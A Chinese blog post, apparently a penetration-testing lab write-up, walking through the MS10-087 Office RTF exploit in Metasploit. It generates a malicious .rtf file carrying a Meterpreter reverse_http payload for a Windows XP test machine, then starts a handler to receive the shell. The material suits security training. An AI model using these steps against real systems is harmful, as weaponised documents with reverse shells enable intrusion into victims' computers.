zoukankan      html  css  js  c++  java

  • 渗透测试中期--漏洞复现客户端渗透攻击--office渗透攻击(ms10_08)

    靶机:WIN XP 10.10.10.130

    攻击机:BT5 10.10.10.128

    一、进入msf终端并查找、调用ms10_087漏洞渗透代码

    msfconsole
search ms10_087
use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof

      

     二、设置参数生成.rtf文档并将文档copy到WIN XP靶机上

      

    set payload windows/meterpreter/reverse_http #调用meterpreter的攻击载荷。反向连接到攻击机
set LHOST 10.10.10.128
set FILENAME ms10087.rtf
exploit

         

          

      

    三、设置侦听模块监听肉鸡上线

    use exploit/multi/handler #使用侦听模块set LHOST 10.10.10.128 #设置本机ip
set LPORT 5000 #设置本机监听的端口
exploit #进行渗透

    之后再WIN XP上打开刚才的.rtf文件,等待肉鸡上线.....
  • 相关阅读:
    合并两个有序链表
    有效括号方法二
    有效括号
    es6 中的模块化
    XMLHttpRequest 对象
    AST
    php读写文件方式
    vue开发中遇到的问题
    sublime操作
    cmd命令
  • 原文地址:https://www.cnblogs.com/white-the-Alan/p/14324007.html
Copyright © 2011-2022 走看看